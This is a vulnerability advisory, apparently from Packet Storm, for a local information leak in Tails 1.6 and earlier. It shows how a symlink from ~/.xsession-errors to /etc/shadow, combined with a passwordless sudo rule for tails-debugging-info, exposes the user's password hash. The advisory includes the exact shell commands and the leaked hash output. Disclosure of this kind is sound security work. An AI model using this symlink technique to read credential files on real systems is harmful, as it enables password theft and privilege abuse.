Tails versions 1.6 and below suffers from an information leak vulnerability via a symlink attack.
4bc182b9191120b13aafd944de470614c5ad8a118056b97853287258da456e0f Tails <= 1.6 tails-debugging-info information leak by cenobyte 2015
<vincitamorpatriae@gmail.com>
On Tails <= 1.6 it is possible to show the contents of /etc/shadow within the
context of the amnesia user when a password is set for that user.
The amnesia user can execute tails-debugging-info as root without a password
using sudo (/etc/sudoers.d/zzz_tails-debugging-info):
amnesia ALL = NOPASSWD: /usr/local/sbin/tails-debugging-info ""
Note: Other commands executed as root using sudo which are not listed in the
sudoers files require a password.
There's a function in tails-debugging-info named debug_file() which serves as a
wrapper around cat:
debug_file() {
echo
echo "===== content of $1 ====="
cat "$1"
}
debug_file() is called in tails-debugging-info with the following parameter:
debug_file "/home/amnesia/.xsession-errors"
The .xsession-errors file is owned by the amnesia user and can be deleted and
replaced with a symlink to /etc/shadow:
amnesia@amnesia:~$ rm ~/.xsession-errors
amnesia@amnesia:~$ ln -s /etc/shadow ~/.xsession-errors
Running sudo tails-debugging-info now displays the password hash of the amnesia
user:
amnesia@amnesia:~$ sudo tails-debugging-info 2>/dev/null | grep ^amnesia
amnesia:$6$r0jt1v9E$UOrWbJ70qAH/sjaKfjmCMvkXZ19bqC2ieQ2UvYk0HKwVvgxuZFtyIwjoLfgH
AwrZVM3a0NTEkcsQY1hn/Uq2S0:16710:0:99999:7:::
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed